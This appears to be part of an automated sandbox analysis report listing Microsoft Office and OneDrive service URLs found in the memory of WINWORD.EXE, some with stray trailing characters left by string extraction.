Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://onedrive.live.com
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com%
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://onedrive.live.com/embed?
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.come
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://osi.office.net
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netd
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://otelrules.azureedge.net
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://otelrules.azureedge.net)
Source: WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office.com
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office.com/
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com1769
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com7
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office365.com
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office365.com/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/D
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: WINWORD.EXE, 00000001.00000003.291974045.0000000010ADE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292057510.0000000010AE3000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx6
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxW
Source: WINWORD.EXE, 00000001.00000003.417530932.0000000010865000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonT
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netN8d
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://powerlift.acompli.net
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://roaming.edog.
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://settings.outlook.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://shell.suite.office.com:1443
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:1443V5L
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://staging.cortana.ai
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airlj
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocationK
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://store.office.de/addinstemplate
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateZ;p
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com%
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com&
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory~j
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/inithJ
